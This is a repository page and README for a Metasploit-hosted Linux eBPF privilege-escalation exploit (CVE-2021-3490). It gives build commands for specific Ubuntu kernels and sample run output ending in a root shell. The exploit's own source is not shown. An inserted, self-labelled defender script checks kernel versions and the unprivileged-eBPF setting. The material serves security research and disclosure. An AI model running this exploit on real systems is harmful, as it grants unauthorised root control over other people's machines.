metasploit-framework/external/source/exploits/CVE-2021-3490/Linux_LPE_eBPF_CVE-2021-3490
Grant Willcox 3bca3b0bcb
Update exploit code to use & after the command to execute as root so it executes in the background and doesn't hang Metasploit. Also update the logic of the code to check the response from executing the exploit and respond accordingly and update the documentation to match
2021-08-31 15:07:37 -05:00
| File | Last commit message | Date |
| --- | --- | --- |
| include | Add support for Linux 5.11.x on Fedora | 2021-08-23 15:09:10 -05:00 |
| Makefile | Add support for Linux 5.11.x on Fedora | 2021-08-23 15:09:10 -05:00 |
| README.md | Add in first copy of the exploit along with the supporting source code and binaries. Documentation to come | 2021-08-17 18:01:14 -05:00 |
| bpf.c | Add in first copy of the exploit along with the supporting source code and binaries. Documentation to come | 2021-08-17 18:01:14 -05:00 |
| exploit.c | Update exploit code to use & after the command to execute as root so it executes in the background and doesn't hang Metasploit. Also update the logic of the code to check the response from executing the exploit and respond accordingly and update the documentation to match | 2021-08-31 15:07:37 -05:00 |
| kmem_search.c | Add in first copy of the exploit along with the supporting source code and binaries. Documentation to come | 2021-08-17 18:01:14 -05:00 |

README.md

Linux_LPE_eBPF_CVE-2021-3490

LPE exploit for CVE-2021-3490. Tested on Ubuntu 20.10 (Groovy Gorilla) kernels 5.8.0-25.26 through 5.8.0-52.58, and on Ubuntu 21.04 (Hirsute Hippo) kernel 5.11.0-16.17. The vulnerability was discovered by Manfred Paul @_manfp and fixed in this commit.

author: @chompie1337

For educational/research purposes only. Use at your own risk.

Usage:

To build for Ubuntu 20.10 (Groovy Gorilla):

```sh
make groovy
```

To build for Ubuntu 21.04 (Hirsute Hippo):

```sh
make hirsute
```

To run:

```
bin/exploit.bin
[+] eBPF enabled, maps created!
[+] addr of oob BPF array map: ffffa008c1202110
[+] addr of array_map_ops: ffffffff956572a0
[+] kernel read successful!
[!] searching for init_pid_ns in kstrtab ...
[+] addr of init_pid_ns in kstrtab: ffffffff95b03a4a
[!] searching for init_pid_ns in ksymtab...
[+] addr of init_pid_ns ffffffff96062d00
[!] searching for creds for pid: 770
[+] addr of cred structure: ffffa0086758dec0
[!] preparing to overwrite creds...
[+] success! enjoy r00t :)
#
```

Note: You must cleanly exit the root shell by typing exit to perform cleanup and avoid a kernel panic.
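A defender-side audit, added here and not part of this repository or the Metasploit module: it reports whether a host's `uname -r` falls inside the kernel ranges listed above as tested, and whether unprivileged eBPF (which the `[+] eBPF enabled` line above shows the exploit needs) is turned off through the `kernel.unprivileged_bpf_disabled` sysctl. The function names, and the mapping of Ubuntu's `uname -r` ABI suffix (`5.8.0-52-generic`) onto the README's package versions (`5.8.0-52.58`), are this example's own assumptions.

```sh
#!/bin/sh
# Added defender-side audit, not part of the original repository. Assumes
# Ubuntu's `uname -r` ("5.8.0-52-generic") carries the ABI part of the README's
# package versions (5.8.0-52.58 -> "5.8.0-52"), and that the sysctl
# kernel.unprivileged_bpf_disabled governs the unprivileged eBPF access the
# exploit output shows it uses. Version fields must be numeric.

# Compare two dotted/dashed version strings field by field; prints -1, 0 or 1.
vercmp() {
    va=$(printf '%s' "$1" | sed 's/[.-]/ /g')
    vb=$(printf '%s' "$2" | sed 's/[.-]/ /g')
    i=1
    while :; do
        fa=$(printf '%s' "$va" | cut -d' ' -f"$i")
        fb=$(printf '%s' "$vb" | cut -d' ' -f"$i")
        if [ -z "$fa" ] && [ -z "$fb" ]; then printf '%s\n' 0; return 0; fi
        fa=${fa:-0}; fb=${fb:-0}      # a missing trailing field counts as 0
        if [ "$fa" -lt "$fb" ]; then printf '%s\n' -1; return 0; fi
        if [ "$fa" -gt "$fb" ]; then printf '%s\n' 1; return 0; fi
        i=$((i + 1))
    done
}

# Classify a `uname -r` string against the README's tested ranges:
# Groovy 5.8.0-25 .. 5.8.0-52 and Hirsute 5.11.0-16. Prints
# "in-tested-range" or "outside-tested-range"; always returns 0.
cve_2021_3490_tested_range() {
    abi=$(printf '%s' "$1" | cut -d- -f1,2)   # "5.8.0-52-generic" -> "5.8.0-52"
    case "$abi" in
        5.8.0-[0-9]*)
            if [ "$(vercmp "$abi" 5.8.0-25)" -ge 0 ] && [ "$(vercmp "$abi" 5.8.0-52)" -le 0 ]; then
                printf '%s\n' in-tested-range; return 0
            fi ;;
        5.11.0-16) printf '%s\n' in-tested-range; return 0 ;;
    esac
    printf '%s\n' outside-tested-range
}

# Report whether unprivileged eBPF is reachable (sysctl 0 = enabled, 1/2 = disabled).
unprivileged_bpf_state() {
    f=/proc/sys/kernel/unprivileged_bpf_disabled
    [ -r "$f" ] || { printf '%s\n' unknown; return 0; }
    case "$(cat "$f")" in
        0) printf '%s\n' enabled ;;
        *) printf '%s\n' disabled ;;
    esac
}

running=$(uname -r 2>/dev/null || printf '%s' unknown)
printf 'kernel %s: %s\n' "$running" "$(cve_2021_3490_tested_range "$running")"
printf 'unprivileged eBPF: %s\n' "$(unprivileged_bpf_state)"
```

A kernel outside the listed ranges is only outside what the README reports as tested, not confirmed patched; the distribution's advisory gives the fixing package version.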

Check out the writeup Kernel Pwning with eBPF: a Love Story.

This research was sponsored by Grapl.